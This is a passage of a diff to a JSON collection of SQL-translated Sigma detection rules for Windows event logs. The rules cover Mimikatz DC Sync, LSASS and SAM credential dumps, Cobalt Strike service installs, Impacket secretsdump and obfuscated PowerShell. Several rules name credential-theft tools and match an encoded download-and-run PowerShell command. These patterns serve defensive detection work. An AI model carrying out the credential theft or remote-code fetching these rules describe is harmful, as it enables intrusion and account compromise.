LIKE '%\\\\Remove-Update.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Run-EXEonRemote.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Schtasks-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-DCShadowPermissions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-MacAttribute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemotePSRemoting.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemoteWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-Wallpaper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Show-TargetScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Speak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-CaptureServer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-WebcamRecorder.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\StringToBase64.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TexttoExe.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VolumeShadowCopyTools.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinPwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSUSpendu.ps1' ESCAPE '\\') OR (TargetFilename LIKE '%Invoke-Sharp%' ESCAPE '\\' AND TargetFilename LIKE '%.ps1' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND TargetUserName = 'ANONYMOUS LOGON' AND WorkstationName = '-' AND IpAddress IN ('127.0.0.1', '::1'))" ], - "filename": "file_event_win_powershell_exploit_scripts.yml" + "filename": "win_security_susp_rottenpotato.yml" }, { - "title": "UAC Bypass Using IDiagnostic Profile - File", - "id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", + "title": "Mimikatz DC Sync", + "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", "status": "experimental", - "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Mimikatz DC sync security events", + "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.s0002", + "attack.t1003.006" ], "falsepositives": [ - "Unknown" + "Valid DC Sync that is not covered by the filters; please report", + "Local Domain Admin account used for Azure AD Connect" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND (Properties LIKE '%Replicating Directory Changes All%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%9923a32a-3607-11d2-b9be-0000f87a36b2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\') AND AccessMask = '0x100') AND NOT ((SubjectDomainName = 'Window Manager') OR ((SubjectUserName LIKE 'NT AUT%' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\')) OR (SubjectUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml" + "filename": "win_security_dcsync.yml" }, { - "title": "Potential Winnti Dropper Activity", - "id": "130c9e58-28ac-4f83-8574-0a4cc913b97e", + "title": "Remote PowerShell Sessions Network Connections (WinRM)", + "id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", "status": "test", - "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", - "author": "Alexander Rausch", + "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of remote PowerShell execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\gthread-3.6.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sigcmm-2.4.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5156' AND DestPort IN ('5985', '5986') AND LayerRTID = '44')" ], - "filename": "file_event_win_redmimicry_winnti_filedrop.yml" + "filename": "win_security_remote_powershell_session.yml" }, { - "title": "WScript or CScript Dropper - File", - "id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", + "title": "Invoke-Obfuscation STDIN+ Launcher - Security", + "id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", "status": "experimental", - "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", - "author": "Tim Shelton", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\ProgramData%' ESCAPE '\\') AND (TargetFilename LIKE '%.jse' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.vba' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\' AND (ServiceFileName LIKE '%${input}%' ESCAPE '\\' OR ServiceFileName LIKE '%noexit%' ESCAPE '\\') AND (ServiceFileName LIKE '% /c %' ESCAPE '\\' OR ServiceFileName LIKE '% /r %' ESCAPE '\\'))" ], - "filename": "file_event_win_cscript_wscript_dropper.yml" + "filename": "win_security_invoke_obfuscation_stdin_services_security.yml" }, { - "title": "PSEXEC Remote Execution File Artefact", - "id": "304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", + "title": "Suspicious Teams Application Related ObjectAcess Event", + "id": "25cde13e-8e20-4c29-b949-4e795b76f16f", "status": "experimental", - "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.execution", - "attack.persistence", - "attack.t1136.002", - "attack.t1543.003", - "attack.t1570", - "attack.s0029" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\PSEXEC-%' ESCAPE '\\' AND TargetFilename LIKE '%.key' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND (ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\')) AND NOT (ProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" ], - "filename": "file_event_win_psexec_service_key.yml" + "filename": "win_security_teams_suspicious_objectaccess.yml" }, { - "title": "PCRE.NET Package Temp Files", - "id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", + "title": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", + "id": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", "status": "test", - "description": "Detects processes creating temp files related to PCRE.NET package", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", + "author": "Orlinum , BlueDefenZer", "tags": [ - "attack.execution", - "attack.t1059" + "attack.privilege_escalation", + "attack.credential_access" ], "falsepositives": [ - "Unknown" + "Administrator activity", + "Proxy SSL certificate with subject modification", + "Smart card enrollement" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND (TemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR TemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND (NewTemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" ], - "filename": "file_event_win_pcre_net_temp_file.yml" + "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" }, { - "title": "Moriya Rootkit", - "id": "a1507d71-0b60-44f6-b17c-bf53220fdd88", - "status": "test", - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "author": "Bhabesh Raj", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ], + "title": "Password Protected ZIP File Opened (Suspicious Filenames)", + "id": "54f0434b-726f-48a1-b2aa-067df14516e4", + "status": "experimental", + "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate used of encrypted ZIP files" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\drivers\\\\MoriyaStreamWatchmen.sys' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND (TargetName LIKE '%invoice%' ESCAPE '\\' OR TargetName LIKE '%new order%' ESCAPE '\\' OR TargetName LIKE '%rechnung%' ESCAPE '\\' OR TargetName LIKE '%factura%' ESCAPE '\\' OR TargetName LIKE '%delivery%' ESCAPE '\\' OR TargetName LIKE '%purchase%' ESCAPE '\\' OR TargetName LIKE '%order%' ESCAPE '\\' OR TargetName LIKE '%payment%' ESCAPE '\\'))" ], - "filename": "file_event_win_moriya_rootkit.yml" + "filename": "win_security_susp_opened_encrypted_zip_filename.yml" }, { - "title": "LSASS Process Memory Dump Files", - "id": "a5a2d357-1ab8-4675-a967-ef9990a59391", - "status": "experimental", - "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Windows ANONYMOUS LOGON Local Account Created", + "id": "1bbf25b9-8038-4154-a50b-118f2a32be27", + "status": "test", + "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", + "author": "James Pemberton / @4A616D6573", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1136.001", + "attack.t1136.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\lsass.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.rar' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Temp\\\\dumpert.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Andrew.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Coredump.dmp' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass\\_2%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdmp%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\') OR (TargetFilename LIKE '%SQLDmpr%' ESCAPE '\\' AND TargetFilename LIKE '%.mdmp' ESCAPE '\\') OR (TargetFilename LIKE 'nanodump%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND SamAccountName LIKE '%ANONYMOUS%' ESCAPE '\\' AND SamAccountName LIKE '%LOGON%' ESCAPE '\\')" ], - "filename": "file_event_win_lsass_dump.yml" + "filename": "win_security_susp_local_anon_logon_created.yml" }, { - "title": "Cred Dump Tools Dropped Files", - "id": "8fbf3271-1ef6-4e94-8210-03c2317947f6", + "title": "Credential Dumping Tools Service Execution - Security", + "id": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", "status": "test", - "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", - "author": "Teymur Kheirkhabarov, oscd.community", + "description": "Detects well-known credential dumping tools execution via service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ "attack.credential_access", + "attack.execution", "attack.t1003.001", "attack.t1003.002", - "attack.t1003.003", "attack.t1003.004", - "attack.t1003.005" + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Legitimate Administrator using tool for password recovery" + "Legitimate Administrator using credential dumping tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\pwdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\kirbi%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwhashes%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_ccache%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_krbtkts%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgdump-log%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\test.pwd' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora64.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wceaux.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SECURITY.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SYSTEM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NTDS.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpExt.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpSvc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pstgdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Dumpy.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%fgexec%' ESCAPE '\\' OR ServiceFileName LIKE '%dumpsvc%' ESCAPE '\\' OR ServiceFileName LIKE '%cachedump%' ESCAPE '\\' OR ServiceFileName LIKE '%mimidrv%' ESCAPE '\\' OR ServiceFileName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceFileName LIKE '%servpw%' ESCAPE '\\' OR ServiceFileName LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "file_event_win_cred_dump_tools_dropped_files.yml" + "filename": "win_security_mal_creddumper.yml" }, { - "title": "CVE-2021-26858 Exchange Exploitation", - "id": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", + "title": "CobaltStrike Service Installations - Security", + "id": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", "status": "test", - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", - "author": "Bhabesh Raj", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.t1203", "attack.execution", - "cve.2021.26858" + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%CacheCleanup.bin' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.LOG' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%cleanup.bin' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%ADMIN$%' ESCAPE '\\' AND ServiceFileName LIKE '%.exe%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%start%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\') OR ServiceFileName LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR (ServiceFileName LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ServiceFileName LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ServiceFileName LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\')))" ], - "filename": "file_event_win_cve_2021_26858_msexchange.yml" + "filename": "win_security_cobaltstrike_service_installs.yml" }, { - "title": "BloodHound Collection Files", - "id": "02773bed-83bf-469f-b7ff-e676e7d78bab", + "title": "Invoke-Obfuscation Via Stdin - Security", + "id": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", "status": "experimental", - "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", - "author": "C.J. May", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], @@ -23906,205 +23357,226 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\_BloodHound.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\_computers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_containers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_domains.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_gpos.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_groups.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_ous.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_users.json' ESCAPE '\\') OR (TargetFilename LIKE '%BloodHound%' ESCAPE '\\' AND TargetFilename LIKE '%.zip%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\pocket\\_containers.json' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%set%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND (ServiceFileName LIKE '%environment%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%${input)%' ESCAPE '\\'))" ], - "filename": "file_event_win_bloodhound_collection.yml" + "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml" }, { - "title": "Octopus Scanner Malware", - "id": "805c55d9-31e6-4846-9878-c34c75054fe9", + "title": "Protected Storage Service Access", + "id": "45545954-4016-43c6-855e-eae8f1c369dc", "status": "test", - "description": "Detects Octopus Scanner Malware.", - "author": "NVISO", + "description": "Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.t1195", - "attack.t1195.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '%IPC%' ESCAPE '\\' AND RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\')" ], - "filename": "file_event_win_mal_octopus_scanner.yml" + "filename": "win_security_protected_storage_service_access.yml" }, { - "title": "Suspicious File Created Via OneNote Application", - "id": "fcc6d700-68d9-4241-9a1a-06874d621b06", + "title": "AD Privileged Users or Groups Reconnaissance", + "id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", "status": "experimental", - "description": "Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.", - "Occasional FPs might occur if OneNote is used internally to share different embedded documents" + "If source account name is not an admin then its super suspicious" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenotem.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OneNote\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.chm' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.htm' ESCAPE '\\' OR TargetFilename LIKE '%.html' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4661' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\')) AND ((ObjectName LIKE '%-512' ESCAPE '\\' OR ObjectName LIKE '%-502' ESCAPE '\\' OR ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-505' ESCAPE '\\' OR ObjectName LIKE '%-519' ESCAPE '\\' OR ObjectName LIKE '%-520' ESCAPE '\\' OR ObjectName LIKE '%-544' ESCAPE '\\' OR ObjectName LIKE '%-551' ESCAPE '\\' OR ObjectName LIKE '%-555' ESCAPE '\\') OR ObjectName LIKE '%admin%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_office_onenote_susp_dropped_files.yml" + "filename": "win_security_account_discovery.yml" }, { - "title": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", - "id": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", - "status": "test", - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "author": "Sittikorn S", + "title": "Possible Impacket SecretDump Remote Activity", + "id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", + "status": "experimental", + "description": "Detect AD credential dumping using impacket secretdump HKTL", + "author": "Samir Bousseaden, wagga", "tags": [ "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\physmem.sys%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\IME\\\\IMEJP\\\\imjpueact.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\IMTCPROT.DLL%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\imecpmeid.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\spp\\\\ServiceState\\\\Recovery\\\\pac.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\cy-GB\\\\Setup\\\\SKB\\\\InputMethod\\\\TupTask.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\config\\\\startwus.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\ADMIN$' ESCAPE '\\' AND RelativeTargetName LIKE '%SYSTEM32\\\\%' ESCAPE '\\' AND RelativeTargetName LIKE '%.tmp%' ESCAPE '\\')" ], - "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" + "filename": "win_security_impacket_secretdump.yml" }, { - "title": "UAC Bypass Using NTFS Reparse Point - File", - "id": 